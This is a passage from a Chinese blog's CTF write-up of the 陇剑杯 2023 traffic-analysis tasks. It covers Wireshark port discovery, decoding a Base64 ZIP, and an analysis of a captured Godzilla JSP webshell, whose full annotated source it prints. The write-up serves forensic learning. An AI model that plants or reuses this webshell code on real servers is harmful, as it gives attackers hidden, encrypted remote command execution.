<p>有写文件的操作，并且文件名是k3y_f1le，我们看看写入了什么内容</p>
<p>那段编码是<strong>Base64 编码的 ZIP 压缩文件</strong></p>
<h2 id="Base64-编码的-ZIP-压缩文件"><a href="#Base64-编码的-ZIP-压缩文件" class="headerlink" title="#Base64 编码的 ZIP 压缩文件"></a>#Base64 编码的 ZIP 压缩文件</h2><p><strong>原始 ZIP 文件</strong></p>
<p>ZIP 文件的标准格式（PKZIP）包含以下关键部分：</p>
<ul>
<li><strong>文件头</strong>：<code>50 4B 03 04</code>（PK..，十六进制标识）。</li>
<li><strong>文件数据</strong>：压缩的文件内容。</li>
<li><strong>中央目录记录</strong>：存储文件元信息（文件名、大小等）。</li>
<li><strong>结束记录</strong>：<code>50 4B 05 06</code>（PK..，标记文件结束）。</li>
</ul>
<p><strong>（2）Base64 编码后</strong></p>
<ul>
<li>Base64 特征<ul>
<li>以 <code>UEsDBBQ</code> 开头（对应 ZIP 文件头的 <code>PK..</code> 的 Base64 编码）。</li>
<li>长度是 4 的倍数（不足时用 <code>=</code> 填充）。</li>
<li>由字母（A-Za-z）、数字（0-9）、<code>+</code>、<code>/</code> 和 <code>=</code> 组成。</li>
</ul>
</li>
</ul>
<p>那我们提取出来为zip</p>
<ul>
<li><p>先将编码内容保存为txt文件</p>
</li>
<li><p>使用Windows的命令还原成zip文件</p>
</li>
</ul>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -<span class="keyword">decode</span> 1.txt source.<span class="keyword">zip</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002720002.png" alt="image-20250422002720002"></p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002735298.png" alt="image-20250422002735298"></p>
<p>但是这个key是需要密码的，这个密码从哪来呢？</p>
<p>我往上翻了一下发现有查看password的操作，猜测这个就是压缩包的密码</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002815511.png" alt="image-20250422002815511"></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">7e03864b0db7e6f9</span><br></pre></td></tr></table></figure>

<p>输入密码果然是对的，成功拿到key的值</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">NSSCTF</span>&#123;<span class="number">7</span>d9ddff2-<span class="number">2</span>d67-<span class="number">4</span>eba-<span class="number">9</span>e48-b91c26c42337&#125;</span><br></pre></td></tr></table></figure>

<h1 id="陇剑杯-2023-hard-web-1"><a href="#陇剑杯-2023-hard-web-1" class="headerlink" title="[陇剑杯 2023]hard_web_1"></a>[陇剑杯 2023]hard_web_1</h1><h2 id="查看开放端口（TCP三次握手）"><a href="#查看开放端口（TCP三次握手）" class="headerlink" title="#查看开放端口（TCP三次握手）"></a>#查看开放端口（TCP三次握手）</h2><p>问题：服务器开放了哪些端口，请按照端口大小顺序提交答案，并以英文逗号隔开(如服务器开放了80 81 82 83端口，则答案为NSSCTF{80,81,82,83})</p>
<p>解题：</p>
<p>先看看tcp的三次握手，用tcp.connection.synack 过滤器</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp<span class="selector-class">.connection</span><span class="selector-class">.synack</span> </span><br></pre></td></tr></table></figure>

<p>tcp.connection.synack 主要用于识别 TCP 三次握手中的 SYN-ACK 包。这个过滤器用于显示 TCP 连接建立过程中的 SYN-ACK 数据包，也就是我们说的握手的第二步，服务器返回给客户端的数据包</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422224654952.png" alt="image-20250422224654952"></p>
<p>我们随便选个数据包看看</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422225542593.png" alt="image-20250422225542593"></p>
<p>这里的话给了源端口和目的端口，这里的源端口就是我们的服务器的端口，因为这是服务器发出的tcp数据包，那我们就看看有哪些端口就行了</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">NSSCTF</span>&#123;<span class="number">80</span>,<span class="number">888</span>,<span class="number">8888</span>&#125;</span><br></pre></td></tr></table></figure>

<h1 id="陇剑杯-2023-hard-web-2"><a href="#陇剑杯-2023-hard-web-2" class="headerlink" title="[陇剑杯 2023]hard_web_2"></a>[陇剑杯 2023]hard_web_2</h1><p>问题：服务器中根目录下的flag值是多少？NSSCTF{}</p>
<p>解题：检索一下http的数据包</p>
<p>发现攻击者进行了大量的目录扫描</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423215716800.png" alt="image-20250423215716800"></p>
<p>然后发现了一个数据包</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422230537037.png" alt="image-20250422230537037"></p>
<p>发现这里有cmd命令执行的口子，ls回显此时在根目录下的文件，我们继续往下看</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422230623860.png" alt="image-20250422230623860"></p>
<p>我们分析一下这个shell.jsp</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;%! </span><br><span class="line"><span class="title class_">String</span> xc=<span class="string">&quot;748007e861908c03&quot;</span>; <span class="comment">//AES加密密钥</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">X</span> <span class="keyword">extends</span> <span class="title class_ inherited__">ClassLoader</span>&#123;<span class="comment">//用于动态加载恶意类</span></span><br><span class="line">    public <span class="title function_">X</span>(<span class="params">ClassLoader z</span>) &#123; <span class="variable language_">super</span>(z); &#125;  <span class="comment">// 继承父类 ClassLoader</span></span><br><span class="line">    public <span class="title class_">Class</span> <span class="title function_">Q</span>(<span class="params">byte[] cb</span>) &#123; <span class="keyword">return</span> <span class="variable language_">super</span>.<span class="title function_">defineClass</span>(cb, <span class="number">0</span>, cb.<span class="property">length</span>); &#125;  <span class="comment">// 动态加载字节码</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//AES加密和解密操作</span></span><br><span class="line">public byte[] <span class="title function_">x</span>(<span class="params">byte[] s, boolean m</span>) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        javax.<span class="property">crypto</span>.<span class="property">Cipher</span> c = javax.<span class="property">crypto</span>.<span class="property">Cipher</span>.<span class="title function_">getInstance</span>(<span class="string">&quot;AES&quot;</span>);  <span class="comment">// 获取 AES 加密实例</span></span><br><span class="line">        c.<span class="title function_">init</span>(m ? <span class="number">1</span> : <span class="number">2</span>, <span class="keyword">new</span> javax.<span class="property">crypto</span>.<span class="property">spec</span>.<span class="title class_">SecretKeySpec</span>(xc.<span class="title function_">getBytes</span>(), <span class="string">&quot;AES&quot;</span>));  <span class="comment">// 初始化（1=加密，2=解密）</span></span><br><span class="line">        <span class="keyword">return</span> c.<span class="title function_">doFinal</span>(s);  <span class="comment">// 执行加密/解密</span></span><br><span class="line">    &#125; <span class="keyword">catch</span> (<span class="title class_">Exception</span> e) &#123; <span class="keyword">return</span> <span class="literal">null</span>; &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">%&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">    <span class="comment">//读取HTTP请求体</span></span><br><span class="line">    byte[] data=<span class="keyword">new</span> byte[<span class="title class_">Integer</span>.<span class="built_in">parseInt</span>(request.<span class="title function_">getHeader</span>(<span class="string">&quot;Content-Length&quot;</span>))];<span class="comment">//获取 HTTP 请求的数据长度</span></span><br><span class="line">    java.<span class="property">io</span>.<span class="property">InputStream</span> inputStream= request.<span class="title function_">getInputStream</span>();<span class="comment">//获取HTTP请求的输入流，也就是发送的加密数据</span></span><br><span class="line">    int _num=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> ((_num+=inputStream.<span class="title function_">read</span>(data,_num,data.<span class="property">length</span>))&lt;data.<span class="property">length</span>);</span><br><span class="line">    data=<span class="title function_">x</span>(data, <span class="literal">false</span>);<span class="comment">//对数据进行AES解密</span></span><br><span class="line">    <span class="keyword">if</span> (session.<span class="title function_">getAttribute</span>(<span class="string">&quot;payload&quot;</span>)==<span class="literal">null</span>)&#123;<span class="comment">//检查 session 里是否已经存储了恶意类。</span></span><br><span class="line">        session.<span class="title function_">setAttribute</span>(<span class="string">&quot;payload&quot;</span>,<span class="keyword">new</span> <span class="title function_">X</span>(<span class="variable language_">this</span>.<span class="title function_">getClass</span>().<span class="title function_">getClassLoader</span>()).<span class="title function_">Q</span>(data));<span class="comment">//用自定义的 ClassLoader（X 类）加载攻击者发送的 恶意字节码，并把加载的恶意类存入session</span></span><br><span class="line">    &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">    request.<span class="title function_">setAttribute</span>(<span class="string">&quot;parameters&quot;</span>, data);  <span class="comment">// 存储解密后的数据（攻击者的命令）</span></span><br><span class="line">    <span class="title class_">Object</span> f = ((<span class="title class_">Class</span>) session.<span class="title function_">getAttribute</span>(<span class="string">&quot;payload&quot;</span>)).<span class="title function_">newInstance</span>();  <span class="comment">// 实例化恶意类</span></span><br><span class="line">    java.<span class="property">io</span>.<span class="property">ByteArrayOutputStream</span> arrOut = <span class="keyword">new</span> java.<span class="property">io</span>.<span class="title class_">ByteArrayOutputStream</span>();  <span class="comment">// 准备输出流</span></span><br><span class="line">    f.<span class="title function_">equals</span>(arrOut);  <span class="comment">// 可能把输出流传给恶意类</span></span><br><span class="line">    f.<span class="title function_">equals</span>(pageContext);  <span class="comment">// 可能把 JSP 上下文传给恶意类</span></span><br><span class="line">    f.<span class="title function_">toString</span>();  <span class="comment">// 可能触发恶意代码执行</span></span><br><span class="line">    response.<span class="title function_">getOutputStream</span>().<span class="title function_">write</span>(<span class="title function_">x</span>(arrOut.<span class="title function_">toByteArray</span>(), <span class="literal">true</span>));  <span class="comment">// 加密并返回结果</span></span><br><span class="line">&#125;</span><br><span class="line">&#125;<span class="keyword">catch</span> (<span class="title class_">Exception</span> e)&#123;&#125;</span><br><span class="line">%&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>很明显是哥斯拉webshell，因为这里对请求和响应进行了加密操作</p>
<ul>
<li>使用AES加密算法对请求和响应数据进行加密和解密操作，密钥为<code>748007e861908c03</code>。</li>
<li>攻击者发送加密的命令，然后服务器解密后交给之前加载的恶意类去执行，并将结果加密返回</li>
<li>加密后的数据通过HTTP请求体传输，攻击者收到加密的响应后进行解密拿到执行结果</li>
</ul>
<p>这个shell.jsp的文件是怎么来的呢？</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423221859531.png" alt="image-20250423221859531"></p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423221841317.png" alt="image-20250423221841317"></p>
<p>这个shell.jsp应该是之前目录探测的时候探测出来的</p>
<p>因为数据是经过gzip压缩的，所以我们得换成二进制去看数据</p>
<p>然后我们接着刚刚的数据流往下看</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423222055379.png" alt="image-20250423222055379"></p>
<p>这里就是利用webshell了，并且此时的响应返回了cookie</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423222130556.png" alt="image-20250423222130556"></p>

    </div>

    
    
    
	
	<div>
	  
		
<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>

	  
	</div>


    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>wanTh3flag
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://wanth3f1ag.top/2025/04/21/%E9%99%87%E5%89%91%E6%9D%AF2023wp/" title="陇剑杯2023wp">https://wanth3f1ag.top/2025/04/21/陇剑杯2023wp/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E9%99%87%E5%89%91%E6%9D%AF2023/" rel="tag"># 陇剑杯2023</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/21/%E7%8E%84%E6%9C%BA%E7%AC%AC2%E7%AB%A0%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90(%E5%B7%B2%E5%81%9A%E5%AE%8C)/" rel="prev" title="玄机第二章日志分析(二刷)">
                  <i class="fa fa-angle-left"></i> 玄机第二章日志分析(二刷)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/22/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" rel="next" title="流量分析">
                  流量分析 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2024 – 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">wanTh3flag</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">3.4m</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">52:06</span>
  </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
